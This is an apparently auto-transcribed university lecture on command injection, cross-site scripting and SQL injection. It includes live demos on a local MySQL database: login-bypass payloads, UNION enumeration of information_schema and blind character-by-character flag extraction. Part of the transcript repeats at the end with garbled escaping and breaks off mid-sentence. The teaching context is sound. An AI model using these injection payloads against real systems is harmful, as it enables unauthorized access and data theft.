End of Semester, Command Injection, HTML and SQL Injection

all right hello everyone uh welcome to second to last week of class everyone excited semester&#39;s almost done yay there a lot it does get picked up on the microphone but they are just going wild here um cool okay uh I&#39;ll be here Monday Wednesday unfortunately I&#39;m out of town next week so Connor is going to teach class and clean up uh then on binary security I think we&#39;ll be done with content probably by next Monday but we&#39;ll see what happens we&#39;ll extend stuff into Wednesday uh as mentioned because I guess some people don&#39;t watch things although I guess if you didn&#39;t watch it on Wednesday why would I expect you to watch today on Monday but uh release two modules as we all agreed on collaboratively on Wednesday the final two modules web security and binary exploitation uh one important note since that got brought up if you am I not logged in sorry let&#39;s go course okay you&#39;re going to see my grade I&#39;m failing this course by the way in case you were wondering um underg grades so you have the weight here this weight because it&#39;s all the same means nothing this is just a relative weight between the modules so the fact that they&#39;re all eight doesn&#39;t mean anything they could be all one which I&#39;ll probably just change them to although that will still be confusing to people it could be all nines it could be all a thousands it really doesn&#39;t matter to literally just that way uh if we want if when running this course if I had wanted to say oh talking web is worth twice as much as the other modules that would be a two and the other ones would be worth one something like that right so but for our purposes here it literally doesn&#39;t matter at all so as stated your grade is here uh I will this week before Wednesday post your current status of extra credit in terms of memes and thanks uh I&#39;ll also pull down the latest um code breaker challenges that were on the syllabus 2 and put them on here that way like as stated on Wednesday these have the latest possible deadline of January 10th like grades are due the next day so that&#39;s why everything gets cut off at midnight of the 10th this means absolute whatever I put in the Discord so before I start talking about stuff that&#39;s on there let me make sure I&#39;m not I&#39;m saying the same content uh but it means very simply that uh absolutely no extension so like just fundamentally impossible any extensions there go into over and we need to deal with like medical incompletes and other kinds of things so if you&#39;ve been thinking about that don&#39;t think about that like if you end up in that situation I&#39;m sorry but that&#39;s just the way it is uh during finals week no inperson help so finals week is in three weeks right so second week of class last week of class and then finals week so finals week no office hours no recitations um and I kind of can&#39;t force anyone to be here because it&#39;s they also have finals to take and everything so you&#39;re kind of on your own on the discords and you&#39;re feel free to help each other but don&#39;t go overboard as normal I don&#39;t know just this way with this whatever grade you&#39;re happy with here that shows up here that&#39;s going to be your grade unless and it can only go higher with extra credit so as soon as you feel like you&#39;re done then you can just be done it&#39;s kind of think of having a button you just say like I&#39;m done and then you can&#39;t ever get a better grade that way you can lock in and not be feel like you have to do this until the 10th any questions on this end of semester class stuff sorry I just realized I was not on the 15 people on Twitch okay there no hands all right now let&#39;s get to learning cool so we left off on command injection so command injection as we hopefully recall is when a most of the things we&#39;re talking about here are web applications but when an application takes our input concatenates it with other strings and then passes it to something like system which then gets repared by bsh just as if we had typed this in on the command line so we saw different types of and ways to exploit this um I&#39;m not going to go over these because we went over them on uh Wednesday and you could watch that lecture I think the key thing because I&#39;ve seen some people maybe struggle in the Discord the key issue here is to think you have full and total power here right so this whatever you&#39;re typing in here once you can execute a command it is if you were in our case the root user and you&#39;re tricking the root user to type in whatever the heck you want so even if like in this case we saw um maybe running a certain command maybe didn&#39;t show the whole flag where we weren&#39;t able to actually extract the flag that way but we&#39;re still root we can do whatever we want what are some things maybe that we would want to do at a high level without talking about specific commands to accomplish our goal what is our goal let&#39;s go one level up what is our goal on the challenges what&#39;s always your goal you&#39;ve been doing this for eight seven modules this has been key chunk of your life yeah get the flag yeah so if you can&#39;t just output it directly by doing like cat flag because the program doesn&#39;t necessarily give you that output what other things could you do you could run LS but you need to get the output so the question is how do you get the output so if you can&#39;t if you if you can run commands without getting the output how could you get the flight you got a whole module on this about accessing stuff with control yeah Mo yeah move it to a different file like there&#39;s nothing that says that it has to be in that file so you can move it or copy it or alter the permissions you could alter the permissions of the destination file you could fundamentally do do anything you wanted to do as that root user so you could U do all kinds of fun stuff but yeah so think creatively like as if you were as root there you can&#39;t get the output of the command but you want to get that file eventually cool okay moving to HTML yes question sure you are running as root set you ID is only so that copy would run as root right so the uh the fact is you are fundamentally running as root when you cont trick the the challenge binary the challenge web server is running as root so it can do anything yeah cool other questions wow super weird that nobody&#39;s sitting over there did you all do that on purpose nobody wanted to sit on that third of the room just all gravitated over here weirdly but some people come in that way I don&#39;t know yeah I am over I mean obviously it makes sense but it&#39;s very weird because most people have sat over there anyways okay this is what happens when it&#39;s close to Thanksgiving okay so other huh are you trying to get no this has been a whole room you guys have been normally equally is spread out in in the terms of this room nobody has to sit over there don&#39;t move because all your stuff&#39;s there that&#39;s a false uh false moves but hey look you have such a good better view of the screen there anyways sorry I noticed these things okay so other things so we talked about HTML right HTML is a web application&#39;s way of specifying to the user what the structure of the document should look like what links they can click on what forms they can fill out what things they can do to the web application and so very often a web application will create its HTML response by again concatenating strings together so here is an example application that has in between P tags has a string hello comma and then some name in red being the user&#39;s input so why might this functionality exist you&#39;re writing an application have you ever seen a website do this I can start calling on people does that help start at the left side of the room and go what&#39;s up yeah so the idea being now it&#39;s a dynamic website that nicely greets the user right so depending on who the user is how they&#39;re logged in right we can see oh it&#39;s this user great I can be a friendly application I can say hello to that specific person maybe like so maybe the results that I give are also unique to that user so the feed that I&#39;m showing whatever if it&#39;s like a Facebook Newsfeed thing or a whatever but the point is like I can customize my HTML response to each of you depending on who you are now the problem is if that input comes directly from the user now fundamentally I can control and and have any code that I want be executed there and one of the key things so again if we go back to let me look at it&#39;s here yes so we look back at HTML right so now if I can inject content and control the structure of this HTML page I can get it to be whatever I want now does it seem seem that exciting maybe I can add more links to the page or something or I don&#39;t know get them to trick trick them to click on something um but a key thing that we can make them do is do I not have any uh one of the key things that we can do is actually get them to execute some code that will run inside of their browser which actually sounds insane um and it&#39;s because it is every time your browser accesses a web page almost every single page will send you some code that your browser running on your machine interprets an executes whatever code that website sends um and that is Javascript so let&#39;s look at I guess we can look at here there is some JavaScript in here yes where I start poking around remember how this works sources I think scripts yeah there we go cool so there&#39;s a ton of JavaScript this is all JavaScript that&#39;s executed every time you visit any uh site on pone College similar sty uh JavaScript exists everywhere else but the point is this is code that is running inside of your browser and has access to everything inside of this web page so oops hello okay let me show an example okay I am going to increase the font size here okay let&#39;s go back to our example cool okay so this isn&#39;t really a dynamic website this is literally just going to be me editing a text file and then us loading that text file in our browser uh let&#39;s see if I can cool everyone see on the right I have this so if we pass in the name of csse 365 refresh right so just like a dynamic website so my browser is parsing this and again because it&#39;s a parser it has to figure out where are those starting and ending tags so we can do cool things like uh we can change our we can change our name and make it into a link that the user can click um can I change what happens before here no I can&#39;t because this is a constant string that is concatenated so I can&#39;t control what happens before and I can&#39;t control what happens afterwards right so every time we&#39;re thinking about injection we need to be thinking about what parts do I control and what parts don&#39;t I control so here I&#39;m controlling just this name in here um I could really uh mess things up I could do maybe ending HTML oops and then the page looks literally like this oh where&#39;s the inspect source source yeah so now it&#39;s kind of like depends on how the parser is going to interpret this will it like do this as the end of the page will it keep showing the stuff that&#39;s after let&#39;s check if I write something after here I actually do see that that&#39;s really weird I&#39;m not sure if this is common for all browser engines um I can start another yeah HTML tag and then what if I end this one anyways the point is I can completely control everything that happens here but one of the big things I would want to do is start executing JavaScript so uh JavaScript was I&#39;m going to go back and we&#39;re going to go back in time okay okay all right since I know we got a little bit of time we can do this ah there we go cool so this was the modern HTML lab we&#39;ve been looking at very static has images tables you can set font size but fundamentally the content was static and this actually gave rise to early websites like lot Yahoo did you guys know Yahoo was literally just a a like a Yellow Pages or a directory for the internet so there were different categories if you&#39;re interested in art or education or entertainment you could click in there and there would be links to other places on the web so it&#39;s just a way literally to find things in this incredibly uh this is actually even before there&#39;s a time before where it didn&#39;t even have search there was no ability to search here um this was the first Amazon website um and you can see very simple just literally a website to sell books Ulta Vista was one of the first uh search engines that actually allowed you to like type in stuff in the search bar and it would just very crappily look for any web page that had that search term in it um and this was the actually the shocking thing about all this is this was the first Google Beta from 1998 and um you can see that it&#39;s almost exactly the same it&#39;s actually even simpler of a more or less of a design the Google homepage than it was here um but the important problem is we want to be able to do fancy things and animations and being able to dynamically respond on the client because every time you clicked a link on any of these Pages or hit the search bar your your browser would then have to make a new HTTP request to the server the server would process it send the response back in HTML and your browser then parse that HTML but for sometimes you don&#39;t need all of that and that became the birth of JavaScript so I want to tell you a little bit about the history here it was originally designed as a language to run inside your browser to interact and manipulate with HTML how many of you know Java yeah many of you great JavaScript has nothing in common with Java except for the first four letters um and this was actually a literal um so it was originally created in 1995 for Netscape one of the browsers at the time called livescript you like he you got to like script things live in your browser it was renamed in December 1995 uh literally um JavaScript as an open crossplatform object scripting language for the creation and customization of applications on Enterprise networks and the internet this is in 1995 whereas JavaScript in Wikipedia is a prototype based scripting languages with Dynamic typing and first class functions uh so this actually has nothing to do with Java it&#39;s literally a different like it&#39;s the syntax is very similar because they both derive syntax from C but fundamentally like prototype based is very much in opposition to class and object orientation so calling it an object scripting language is like super weird uh literally they um they it was basically like a marketing Ploy because believe it or not I know this may be very hard to believe at the time but in like 1995 Java was considered the hot new language like U I don&#39;t know what&#39;s a hot new language that you all think is cool for us like yeah rust so this was like the rust actually it&#39;s a very good uh app description because with Java they told everyone like hey this is great um you don&#39;t have to worry about buffer overflows just like rust and you write once and deploy everywhere because you write it it compiles to the jvm and different jvm implementations run on different machines uh what it turned out was right once debug everywhere was actually the real thing that happened and so uh anyways hope in 20 years maybe you&#39;ll remember this class and as soon as people you tell uh people that you used to think rust was cool and they go W that&#39;s such an old language why would you ever think that but anyways um in 1996 Microsoft added support for JavaScript to internet exp Internet Explorer and it turned into a standardization so the JavaScript language was standardized in 1996 but fundamentally was just created for One browser to add some Dynamic capabilities and now it is essentially the Lang of the web so JavaScript is fundamentally the way that you uh think about and is supported by all browsers and it evolved organically along the way which is why it&#39;s very very weird uh but let me show you some examples so you use the script element or the script tags is the um way of creating JavaScript so you have script tags uh this was a very very old style of doing this where you had um these tags here is a HTML comment so it tells the browser hey consider anything in here to be a comment and this was for browsers that didn&#39;t support JavaScript that way they wouldn&#39;t show what was in the script tags so if you&#39;re a browser and you did support it you would know not to take off those HTML comments and you would start executing the code there so you can do things like uh there&#39;s a whole um system and stuff but it&#39;s very similar to what you&#39;re doing it&#39;s not anything that&#39;s too crazy so you can prompt things like hey please enter your name you can set that to a variable called name you can check if name is null then write welcome to my site otherwise write welcome to my site and then the plus is concatenation here and so you can do this uh you can also specify exactly the language here although this is really not needed now um so you could run this page and it would say hey please enter your name below you could enter something like Adam in and then it would say hey welcome to my site Adam okay uh you can also include external Javascript files this is actually not strictly needed for what we&#39;re doing but something that&#39;s very useful is you can have a source attribute then have an absolute or relative URL and so the browser when it parses this will make another HTTP request fetch that content and execute it as if it was javascrip code okay I&#39;m going to skip all this we don&#39;t need to do this okay JavaScript though is okay so everything in JavaScript is an object and guess what you learned Json way back when when you were making web requests by hand in netcat those fun fun days um so Json those everything in curly braces and Json derives from the Syntax for JavaScript for objects uh objects are pretty sweet they&#39;re just like hash tables or arrays you can add properties and values at runtime so you can have something like VAR object equals and so the curly braces is so this is a object that has one property named test with the value Fu as a string and another property numb with the value of 50 we can then so objects you can think of things they can be recursive you can have object uh and this is accessing a property so this is with array syntax saying the object the property with name FU set it to be equal to object and we can log itself so we can do object test is what here in this example Fu and then object fu is the object itself because we said it here object Fu you can set num to be a th000 we can log it and then we can look at it here in the console one of the cool things is you can just uh if you&#39;re ever curious about how something works in JavaScript you can open up your good old web browser here in the console you can just put code here and you can just type it in uh can I make this oh yeah there we go so I can type all this in here so I can look and inspect this object so this is my object called object that has three properties Fu num and test fu is the object itself so if you keep going down Fu it&#39;ll go down here forever um one thing so I use this syntax right object bracket string Fu this is one way you can access properties the other way is the dot syntax so you can just say object. FU and it&#39;s EX exactly the same thing it&#39;s literally just it&#39;s the same syntax uh the fu is the just the same syntactic sugar for the exact same thing okay okay I think that&#39;s all we need to do under here this much more complicated stuff so what we can do is now we are here so once we have this injection we can write any JavaScript code we want inside of script tags one of the classic things uh if you look up the alert function so instructs the browser to display a dialogue with an optional message this is one of the ways that uh as security analysts we show that we can execute JavaScript code on your web page by making it pop up a window here so so this is Javascript code so this is when I refresh that the very first thing it does it&#39;s parsing this and did the developer the original developer this website intended did they intend for there to be JavaScript code here no this is only because we the attacker tricked the web application to include this JavaScript code and so we can do whatever we want here we can um I think that&#39;s how you do it let&#39;s see nope that&#39;s writing it there I always have to look this stuff up JavaScript overwrite HTML of page ah. replace document. replace oh okay document Open document right document close that&#39;s HTML inner HTML there we go that&#39;s that works boom so completely changing the content of the page um we can do let&#39;s see you redirect is a document Dot redirect with JavaScript may have blocked it because of the domains oh location that&#39;s right boom so redirecting them to another place fundamentally I can do whatever I want I can um if the web application uses cookies which this one probably will not ah it won&#39;t even let me go back that&#39;s really yeah undefined because I don&#39;t have any cookies uh let&#39;s insert some cookies storage local storage add new password I don&#39;t know JavaScript depends on how it set the cookies but let me just double check cookie not cookies see this is why reading the documentation is so important this is why I had to tell you of what to do and that did nothing I can go to the console here document. cookies cookie cookies yeah there we go cool so if cookies were set I could get them I guess it should be like this yeah it could be about the specific way that I set them um if you could get them or not there are like lots of possible security measures here but fundamentally I could do anything and this means that if I was now and especially if you&#39;re logged into this website I can now act as you as the user so I could steal your cookies to try to log in as you I could have you the user transfer me remember when we looked at the uh the bank transferring money right between things I will introduction oh yeah here we go here&#39;s our good friend the bank right so if I were able to trick blue into executing code from Green from the bank that says hey transfer money $1,000 from Red the bank has no idea that this is coming from not coming from the actual user so you can really do anything um there cool okay questions here all right oh and I guess uh uh just for the record when you go out into the world this is called cross-site scripting the idea being another an a criminal or a hacker got you tricked your browser into executing JavaScript that they wanted to execute so that&#39;s the cross site so uh and the abbreviation for this is xss so if you see that that&#39;s what that means okay cool now again another case where people want to concatenate strings is with with when creating SQL queries so here we have a SQL query select star from users where username equals single quote Conor single quote and password equals single quote password one two3 single quote this was the example when we&#39;re looking at SQL so what&#39;s the point of this query what would be a use case of this query yeah yeah why would we want to look for the specific users information say it again yeah so we&#39;re we&#39;re trying to check so this would be an application where they&#39;re trying to check did the user provide the correct username and password right so like yeah they&#39;re going to log in we&#39;re going to check first hey does there exist any user in this database that has the username Conor and the password of password two 3 if if it does presumably then we would log the user in that&#39;s exactly what this query would do now now fundamentally if we control what&#39;s in the string Connor and here in this password we can fundamentally put in whatever we want here so let&#39;s do you guys want to try it on a real database no where is there real database um oh there we go this is where you&#39;re just hoping that somewhere back back in your history somebody did this once okay where do I have a web server running access such a pain I don&#39;t like SQL light uh okay I think I have an idea let&#39;s see I usually I can quick quickly install something on here can&#39;t locate the package MySQL oh it&#39;s MySQL server okay we&#39;ll just St in MySQL server on a random thing we&#39;ll create the table this will be super fun and then we will hack it okay it&#39;s running very good progress all right now I&#39;m into my SQL server or I&#39;m I&#39;m running so now when I&#39;m typing commands in here this as if we&#39;re running queries so I could say select and let me make this bigger okay it&#39;s going to say error no database collected uh so use wait do I create it first use 365 my SQL okay I did okay oh I guess I can&#39;t do that create database hack me use hack me create what is it table [Music] users all right my SQL h a data type varchars are great just means variable characters okay I see actually it should just work without the strings no yay okay insert into users values uh admin super secret uh want to make sure insert into users values value one value two how do I do multiple values I think it&#39;s just separated by commas like this okay and let&#39;s go back to our thing admin password a [Music] Conor okay password 2 three select hey got data in there cool okay now let&#39;s go back to our query so we&#39;re going to simulate having a website we are writing this statement okay select so it&#39;s going to be select star from users where username is equal to name and password equals password okay so let&#39;s run this okay why did that return nothing we don&#39;t have anything in the database that matches that okay we did have the example of why is there space in front of here why is this not saving this query it&#39;s GNA drive me insane okay Connor so now if we know Connor&#39;s password we can log in and that returns one user so our web application would say great user accepted log in awesome okay so weird so you can write in anything where into this string where do you what do you control the username and password specifically after the single quotes so why is the so the application is specifically uh adding single quotes around your input because it knows that this is how you specify a string in my SQL so specifically here and here we control inside of those strings awesome so select start from users username is equal to Connor so we can put in if there&#39;s no restrictions from the web application we can put in whatever we want here so what might we want to put in yeah another single quote what&#39;s the point of that single quote so it matches the first single quote and now now what do you want to type in yeah so or maybe so we say username is equal to blank 1 equals 1 what do you want to put in for password let&#39;s just do password okay what&#39;s gonna happen when I hit enter yeah it&#39;s not going to let me and I wish it didn&#39;t do this uh oh I have an idea okay let&#39;s do this is a great example I&#39;ll do this quit Pudo MySQL do you just write the command here no it&#39;s uh first the database name hack me and thenc yeah that&#39;s right okay thank you okay cool because I wanted to simulate more of what happened and as you saw when we tried to enter that command the MySQL uh prompt wouldn&#39;t even let you type that prompt in because it has a syntax error what&#39;s the problem we put in single quote space or space one equals one and then the application put a single quote and password equals to and then this single quote but then there&#39;s a password and then like a dangling single quote right so we&#39;re very close here but the problem is we&#39;re not matching those things and the problem is there&#39;s a bunch of gibberish that we have to deal with after this so what was the trick we used in command injection in order to not have to deal with anything that came after us what was that comment it out let&#39;s look up I think we talked about it in the last one but let&#39;s look at my SQL comment syntax from a dash character to the end of the line or from a A or sorry a hash character to the end of the line or from a Double Dash to the end of the line um I&#39;m going to show you the Double Dash because the database you&#39;re going to be using is SQL light and I want to show you one that works on both I believe it&#39;s Double Dash yeah and so you can see this anybody remember remember this uh this type of graph back when we looked at Json syntax so here in SQL light dash dash to anything except new line to new line will be a comment and that&#39;s the same in sqlite and in my SQL so we do this really hope that was going to work why did that not work oh I think we need a space yes there we go okay why did we need the space because the characters were specifically a Double Dash without any space at the end I guess my sequel is trying to interpret that as its own thing and doesn&#39;t really see the uh let&#39;s actually look this is crazy ah insane I wonder if this is what messed me up on a CTF once it&#39;s interesting anyways okay so what did this do why did this return us all the results in the database yeah so this is the query that we ran select star from users where username is equal to blank or 1 equals 1 how many times is 1 equals 1 true it&#39;s all always true and true or false is true so this returns true for every single Row in the database and return all of the rows what if we just wanted to return the admin rather than doing or one equals one what would we do louder admin and then what if I do this what is it going to do still GNA return to all why yeah for all of them so how do I fix it say it again cool so now let&#39;s say we do this on the login form we say hey we want to log in as the admin here&#39;s my password password but actually I say we don&#39;t want to log in as admin we want to log in as admin tick space-- space and it goes it says oh yep there&#39;s one result that&#39;s good let me log you in now as this user and then boom you&#39;ve now logged in as the admin user and we we can even go let&#39;s see where are we going here make sure I&#39;m balancing the time cool oh yeah perfect okay we can even go crazier than here so let&#39;s [Music] do let&#39;s uh create table I feel like I have that syntax nope uh create table flag uh let&#39;s say there&#39;s flag that&#39;s a varar 255 okay insert into flag values P get get this flag okay so let&#39;s say we get this output well let&#39;s say it&#39;s not uh the username and password but whatever we get this output but we can control so again we can control anything in password we kind of figured we don&#39;t need to do that because we can deal with anything that&#39;s in here so we can just by changing this username now can I control anything that happens before the username select star from users where no we cannot but so we you can use this as we saw to get anybody&#39;s username we can also so let me did did we talk about that I seeq will get tables so let&#39;s look up yeah cool so it turns out two things we need to look at one let&#39;s go back to just our normal my SE e gross okay that&#39;s too many tables ah this person sucks okay table schema test I haven&#39;t seen that my SQL this has a ton of information let&#39;s see DB5 okay okay here&#39;s oh am I not wait use ha nope okay I feel like this should be a lot easier okay there we go yeah there we go why does that reveal so much I thought there was like okay well here is our hack me and here is the users and flags yeah there we go thank you but what do we put for table is it a base table let&#39;s just do a select all on that this is something you can look up by the way it&#39;s not uh yeah but where&#39;s the oh God what okay but why why is this this should be very simple what are you trying to select I want see the tables but just the user tables like why is there all this there&#39;s a bunch of junk tables there&#39;s 330 tables you want to make it slightly simp table yeah I would like this but with only the user table this definitely way oh they&#39;re right at the top but uh all right I will find this no okay that was gonna be a cool demo all right oh that&#39;s what I want inject all the things hey there we go payload all the things that&#39;s what okay this has everything I could ever need cheat sheet my SQL injection uh my SQL oh good it has all the comments testing yes okay great great extract database with information schema thank you tables that&#39;s annoying oh schema okay great ah okay okay okay so these are all the different databases excellent okay and then ah there we go I hate how it does this I see so I had to First figure out what the database name was okay uh and I could just do the table name got it okay now I figured out how to Pivot here okay perfect where were we cool okay okay so we are back here select start from users we username equals blot okay this is where we were great now let&#39;s say we have our tick now everybody remember our friend the union syntax which was used to Union two select statements yeah so how many columns did we did our users table have two columns we may or may not know that depending if we don&#39;t we can actually just keep guessing we can do Fu uh that&#39;s right let&#39;s just go we go like this okay there we go that&#39;s the syntax so this select Fu bar yeah so if we did and what&#39;s super interesting you won&#39;t have to get into this but oh it does do that so you can figure out how many columns are needed by just keeping adding one to the select statement until you get the correct you get an output a non-error everything else errors so what this does is says Hey select start from users for username is equal to nothing which we don&#39;t care about Union that with select one two3 well select one two3 is not very useful and select Fubar is also not useful why is this not useful yeah well this Fu Barb like we gave that input so it&#39;s just proving that what we give comes back to us but we gave that so that&#39;s not interesting um but I don&#39;t even know where the data is that I want but I know by looking it up in that uh payload all the things that I can select in my SQL and other database engines have very similar things I could say select and that&#39;s going to fail because that has the different wrong number of columns so what I really want from here where did I want from schemata I want the schema name select schema name again not going to work because when I&#39;m unioning has one column on the right side and two columns on the left so I just need to add something so this shows me that hey there&#39;s the my SQL schema in information schema performance schema CIS and hackme hackme sounds good let&#39;s figure out all the tables in hackme so now I can use my other query now that I know that I can do where was my query there we go so now I&#39;m going to Union that query with select star from information scheme. taes where table schema is equal to hack me that will not work so I want I believe it&#39;s just called T table name so table name I have flag in users I&#39;m already quaring all the all the users table so which data do I want like which table do I want of these two tables flag we want the flag let&#39;s get the flag I actually from here I don&#39;t know what the columns are but you can actually read if you really want to you can read all the columns in that table so you can figure out of the flags table what are the columns there but we can do that here now that I know what table to search for select start from Flags wrong number of columns so I actually now will need to do that so let&#39;s select columns where table name okay select star from columns where table name is equal to flag okay wrong number of columns I will do column name aha there&#39;s a flag so it should just be select flag from flag that won&#39;t work because of the wrong number of columns FX flag comma one ah there we go so now I&#39;ve finally got the flag so fundamentally from doing this you can actually uh get are the parentheses necessary around this this select statement no they&#39;re not it just helped me when I was doing that uh that was a question on Twitch SQL syntax is almost a little too forgiving so I like to I just be very careful there yeah yeah so this just means so so what I&#39;m saying is hey select from the table flags and for my results I want the First Column to be flag whatever is in the database as flag and the second column I just want to be one like the literal one so that&#39;s what this does this just makes this just returns one for the password I could make it return a string as Fu I can make it return whatever I want I could put flag twice but the important thing is because the with the Union the select on the left the users table has two columns that the result when you Union them has to have two otherwise you can&#39;t put them together right if like think about like building blocks right you have like like Legos you have to size two and you had a one and try to put that on there that&#39;s not going to work if you had a three that&#39;s too big it has to be exactly the same size so that you&#39;re your application gets all those same results and the crazy thing is do they I can&#39;t remember do they do this in the assignment of uh of blind yeah so what&#39;s crazy is you can so we were able to read the flag here why because we can see the output here right in this table we we see these results the application may or may not give us the results here so um one so there but you can do uh really cool things you can actually and there is a I guess I don&#39;t have it installed um do we have it installed on the dojo no so we can do cool things like okay let me see I want do this users you can select let&#39;s see there are hey there we go so we can actually do things like select or let&#39;s say we can&#39;t get this so all we&#39;re getting output is Fufu uh but we can say where left flag let&#39;s see string length say one so so what I can do is I can set up a SQL query such that if it returns something if it it returns a results if the first character of the flag so the left this left function I just looked up from the documentations specifies the number of characters from the L of the string both the number and the string are supplied as arguments of the function so this would be the string and the length so I can iterate over this and brute force all the characters from A to Z big a to Big Z 0 through nine and what&#39;s the difference how do I know if I&#39;m correct wait why did that work SQL must be case insensitive that was not what I me to show wow that&#39;s annoying okay this is the problem when you just copy and paste random stuff okay SQL case sensitive comparison my squel ah okay all right it&#39;s fine okay so I know it&#39;s not a I know it&#39;s not B but when I get to P so why is that so so let&#39;s say the application will give me an error if there&#39;s nothing or give me a page like a 500 versus a 200 error so the only thing I can see I can&#39;t see what it returns but I can know if my query gave zero results or nonzero results so that&#39;s what we&#39;re doing here is by checking and taking the flag by creating a wear Clause such that by creating a wear Clause such that I have a condition based on part of the flag and a value that I Supply I can then test and I can make 255 of these queries for each character um I can even let&#39;s see my SQL SQL function or python there&#39;s a way to like turn it yeah there we go no not python yeah or just like ah it is or so just like in um in what iall it in Python we can call or on this to turn it into an integer and then that will not work but if we do man asky let&#39;s see p is at 70 and capital P is going to be at 5050 and these are hex aha there we go so now we found a way to determine the case of this so if our program in the first case gives us a 500 error we can use that so this is the crazy thing is with one bit of information whether the query returns something or doesn&#39;t return something we we can completely we can use this to Brute Force this and what&#39;s even crazier uh so what&#39;s faster than a linear search through 0 to 255 to see which one hits somebody&#39;s taking 310 yeah yeah so it&#39;s faster than a linear search so rather than searching zero trying everything zero to 255 yeah a binary search so I can do something like because I don&#39;t have to do equality I can do less than or equal to right so I can say say is is this less than and I would do what&#39;s in the middle of 255 and 255 by two let&#39;s say 127 which it definitely will be so this is a yes so I got a yes response because I got something back so okay so I can do zero now between 27 275 so I can do 127 divid 2 63 nope it&#39;s not less than that so I know it&#39;s somewhere between 63 and 2 127 uh 63 uh this is doing this by hand is kind of a pain but this is why you have computers 96 96 so it&#39;s not so it&#39;s between 96 and 127 112 okay it&#39;s not that Conor you&#39;re you&#39;re a great orle 120 yes so it&#39;s between 120 and 112 116 116 yes so between 116 and 112 118 118 yes 119 119 yes also yes I have to check quality at some point right something is wrong oh Conor Conor Conor con so it&#39;s not less than 112 but it is less than 120 and less than I see yeah so we should have gone down after 18 right uh so we should have done 114 we will find it correct yes not 112 so what does that mean it is it is yeah or so yay and binary search well you know we are not computers it&#39;s okay if we&#39;re not doing the binary search properly yes there we go okay that&#39;s octal so it&#39;s octal decimal and hex so it&#39;s p so we figured out the first character we can do yes thank you there&#39;s much rejoicing from the audience um oh shoot that took a long time okay so we first have to then put everything together of why is this safe so as we talked about with Java Script you have basically random code that you&#39;re downloading onto your machine and the whole point is that your browser wants to ensure that different websites and different tabs you can think of as tabs can&#39;t really mess with each other so when you&#39;re accessing something and you&#39;re including images there from let&#39;s say red and from Blue your browser will then go and fetch those and it can um yes so when you so uh the way this works is it gets to the what is the same origin policy so the origin is this three tle of scheme host and Port scheme being HTTP or https host being the domain name and Port being the port of the connection so anything that where those triple is the same it exists in the same origin so for instance um HTTP example.com has the I hate this is uh the dreaded Google slides to PowerPoint conversion uh example.com the root site has the origin HTTP example.com and 80 which if you&#39;re fetching cat.gif from there it&#39;s the same HTTP example 80 whereas if it&#39;s from a different origin even if it&#39;s the exact same host and Port that is a different origin different port is a different and so you can send cross origin requests if there are uh wow okay Dam all right uh sorry we&#39;re at the end of time we&#39;re G have to we spend too much time on SQL injection but uh we&#39;ll do this on Wednesday

all right hello everyone uh welcome to second to last week of class everyone excited semester&amp;#39;s almost done yay there a lot it does get picked up on the microphone but they are just going wild here um cool okay uh I&amp;#39;ll be here Monday Wednesday unfortunately I&amp;#39;m out of town next week so Connor is going to teach class and clean up uh then on binary security I think we&amp;#39;ll be done with content probably by next Monday but we&amp;#39;ll see what happens we&amp;#39;ll extend stuff into Wednesday uh as mentioned because I guess some people don&amp;#39;t watch things although I guess if you didn&amp;#39;t watch it on Wednesday why would I expect you to watch today on Monday but uh release two modules as we all agreed on collaboratively on Wednesday the final two modules web security and binary exploitation uh one important note since that got brought up if you am I not logged in sorry let&amp;#39;s go course okay you&amp;#39;re going to see my grade I&amp;#39;m failing this course by the way in case you were wondering um underg grades so you have the weight here this weight because it&amp;#39;s all the same means nothing this is just a relative weight between the modules so the fact that they&amp;#39;re all eight doesn&amp;#39;t mean anything they could be all one which I&amp;#39;ll probably just change them to although that will still be confusing to people it could be all nines it could be all a thousands it really doesn&amp;#39;t matter to literally just that way uh if we want if when running this course if I had wanted to say oh talking web is worth twice as much as the other modules that would be a two and the other ones would be worth one something like that right so but for our purposes here it literally doesn&amp;#39;t matter at all so as stated your grade is here uh I will this week before Wednesday post your current status of extra credit in terms of memes and thanks uh I&amp;#39;ll also pull down the latest um code breaker challenges that were on the syllabus 2 and put them on here that way like as stated on Wednesday these have the latest possible deadline of January 10th like grades are due the next day so that&amp;#39;s why everything gets cut off at midnight of the 10th this means absolute whatever I put in the Discord so before I start talking about stuff that&amp;#39;s on there let me make sure I&amp;#39;m not I&amp;#39;m saying the same content uh but it means very simply that uh absolutely no extension so like just fundamentally impossible any extensions there go into over and we need to deal with like medical incompletes and other kinds of things so if you&amp;#39;ve been thinking about that don&amp;#39;t think about that like if you end up in that situation I&amp;#39;m sorry but that&amp;#39;s just the way it is uh during finals week no inperson help so finals week is in three weeks right so second week of class last week of class and then finals week so finals week no office hours no recitations um and I kind of can&amp;#39;t force anyone to be here because it&amp;#39;s they also have finals to take and everything so you&amp;#39;re kind of on your own on the discords and you&amp;#39;re feel free to help each other but don&amp;#39;t go overboard as normal I don&amp;#39;t know just this way with this whatever grade you&amp;#39;re happy with here that shows up here that&amp;#39;s going to be your grade unless and it can only go higher with extra credit so as soon as you feel like you&amp;#39;re done then you can just be done it&amp;#39;s kind of think of having a button you just say like I&amp;#39;m done and then you can&amp;#39;t ever get a better grade that way you can lock in and not be feel like you have to do this until the 10th any questions on this end of semester class stuff sorry I just realized I was not on the 15 people on Twitch okay there no hands all right now let&amp;#39;s get to learning cool so we left off on command injection so command injection as we hopefully recall is when a most of the things we&amp;#39;re talking about here are web applications but when an application takes our input concatenates it with other strings and then passes it to something like system which then gets repared by bsh just as if we had typed this in on the command line so we saw different types of and ways to exploit this um I&amp;#39;m not going to go over these because we went over them on uh Wednesday and you could watch that lecture I think the key thing because I&amp;#39;ve seen some people maybe struggle in the Discord the key issue here is to think you have full and total power here right so this whatever you&amp;#39;re typing in here once you can execute a command it is if you were in our case the root user and you&amp;#39;re tricking the root user to type in whatever the heck you want so even if like in this case we saw um maybe running a certain command maybe didn&amp;#39;t show the whole flag where we weren&amp;#39;t able to actually extract the flag that way but we&amp;#39;re still root we can do whatever we want what are some things maybe that we would want to do at a high level without talking about specific commands to accomplish our goal what is our goal let&amp;#39;s go one level up what is our goal on the challenges what&amp;#39;s always your goal you&amp;#39;ve been doing this for eight seven modules this has been key chunk of your life yeah get the flag yeah so if you can&amp;#39;t just output it directly by doing like cat flag because the program doesn&amp;#39;t necessarily give you that output what other things could you do you could run LS but you need to get the output so the question is how do you get the output so if you can&amp;#39;t if you if you can run commands without getting the output how could you get the flight you got a whole module on this about accessing stuff with control yeah Mo yeah move it to a different file like there&amp;#39;s nothing that says that it has to be in that file so you can move it or copy it or alter the permissions you 